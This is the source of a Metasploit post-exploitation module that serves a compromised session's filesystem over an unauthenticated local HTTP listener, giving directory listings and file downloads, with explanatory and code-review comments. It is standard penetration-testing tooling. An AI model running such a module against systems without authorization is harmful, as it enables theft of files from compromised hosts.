Path: blob/master/modules/post/multi/manage/fileshare.rb
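##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'cgi'

# Post module that starts an HTTP listener and answers each request by
# listing a directory of, or returning a file from, the filesystem of the
# attached session.
#
# The request handlers below perform no authentication: whoever can reach the
# listener can read whatever the session can read. The module's default
# SRVHOST of 127.0.0.1 is the only access restriction visible in this file.
class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Exploit::Remote::HttpServer

  # Registers the module metadata. SRVHOST defaults to loopback so the
  # listing is reachable only from the machine running the framework unless
  # the option is changed.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Browse the session filesystem in a Web Browser',
        'Description' => %q{
          This module allows you to browse the session filesystem via a local
          browser window.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'timwr'],
        'Platform' => [ 'linux', 'win', 'osx' ],
        'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
        'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
        'Notes' => {
          'Reliability' => [ ],
          'SideEffects' => [ ],
          'Stability' => [ CRASH_SAFE ]
        }
      )
    )
  end

  # Entry point for the post module; hands control to the HTTP server mixin.
  def run
    exploit
  end

  # Prints the URL that maps to the session's current working directory.
  # Backslashes are turned into forward slashes on Windows sessions so the
  # path can be appended to the listener URI.
  def primer
    uri = get_uri.chomp('/') + '/'
    current_dir = pwd
    current_dir = current_dir.gsub('\\', '/') if session.platform == 'windows'
    print_status("Current directory: #{uri}#{current_dir}")
  end

  # Builds the entries shown for one directory.
  #
  # @param file_path [String] directory on the session ('/' for the root)
  # @param uripath [String] listener resource path, with a trailing '/'
  # @return [Array<Array<String>>] pairs of [link URL, display name]
  def list_path(file_path, uripath)
    # The root of a Windows session is presented as the list of drives.
    if file_path == '/' && session.platform == 'windows'
      return get_drives.map do |drive|
        driveurl = drive + ':/'
        [uripath + driveurl, driveurl]
      end
    end

    # Avoid a doubled slash when the path is absolute.
    base_url = file_path.start_with?('/') ? uripath.chomp('/') : uripath
    base_url += file_path.chomp('/') + '/'

    dir(file_path).reject { |file| ['.', '..'].include?(file) }.map do |file|
      [base_url + file, file]
    end
  end

  # Maps a request URI to a path on the session and answers with the file
  # contents, an HTML directory listing, or a 404.
  #
  # File names and file contents come from the session host and end up in the
  # browser of whoever views the listing, so every name is HTML-escaped and
  # the responses tell the browser not to cache or content-sniff them.
  #
  # NOTE(review): request_uri is used as received and the links are
  # HTML-escaped but not URL-encoded; names containing spaces, '?', '#' or '%'
  # presumably do not round-trip -- confirm against the HTTP server's request
  # parsing.
  #
  # @param cli the client connection the response is written to
  # @param request_uri [String] URI of the incoming request
  def handle_response(cli, request_uri)
    uripath = get_resource.chomp('/')

    # Convert http://127.0.0.1/URIPATH/file/ -> /file
    if request_uri != uripath && request_uri.start_with?(uripath)
      file_path = request_uri[uripath.length..-1].chomp('/')
    end
    file_path = '/' if file_path.blank?

    uripath += '/'

    # Convert /C: -> C:/
    if session.platform == 'windows'
      file_path = file_path[1..-1] if file_path.start_with?('/')
      # \z anchors at the end of the string; `$` would also match before a
      # line break inside the path.
      file_path += '/' if file_path =~ /[A-Z]:\z/
    end
    file_path = '/' if file_path.blank?

    print_status("Request uri: #{request_uri} file_path: #{file_path} from #{cli.peerhost}")
    root_dir = (file_path == '/')

    if file?(file_path) && !root_dir
      # Download the file
      data = read_file(file_path)
      send_response(cli, data, fileshare_headers('application/octet-stream'))
    elsif directory?(file_path) || root_dir
      # List the directory
      body = "<h2>Directory listing for #{CGI.escapeHTML(file_path)}</h2><hr>"
      body << "<ul>\n"
      unless root_dir
        # Parent link: everything up to the last '/' of the request URI.
        basedir = request_uri[0, request_uri.chomp('/').rindex('/')]
        basedir = '/' if basedir.blank?
        body << "<li><a href=\"#{CGI.escapeHTML(basedir)}\">..</a>\n"
      end
      list_path(file_path, uripath).each do |furl, fname|
        body << "<li><a href=\"#{CGI.escapeHTML(furl)}\">#{CGI.escapeHTML(fname)}</a>\n"
      end
      body << "</ul>\n"
      # The stray closing style tag that followed the body has been dropped;
      # the page never opens a style element.
      html = %(<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<title>Metasploit File Sharing</title>
</head>
<body>
#{body}
</body>
</html>
)
      send_response(cli, html, fileshare_headers('text/html'))
    else
      send_not_found(cli)
    end
  end

  # HTTP server callback. A Meterpreter request failure while reading the
  # session filesystem is reported to the browser as a generic 500.
  def on_request_uri(cli, request)
    handle_response(cli, request.uri)
  rescue ::Rex::Post::Meterpreter::RequestError
    cli.send_response(create_response(500, 'Unknown error'))
  end

  # Response headers shared by downloads and listings: the declared content
  # type, no caching, and no MIME sniffing of content that originates on the
  # session host.
  #
  # @param content_type [String] value for the Content-Type header
  # @return [Hash{String => String}]
  def fileshare_headers(content_type)
    {
      'Content-Type' => content_type,
      'Cache-Control' => 'no-cache, no-store, must-revalidate',
      'Pragma' => 'no-cache',
      'Expires' => '0',
      'X-Content-Type-Options' => 'nosniff'
    }
  end
end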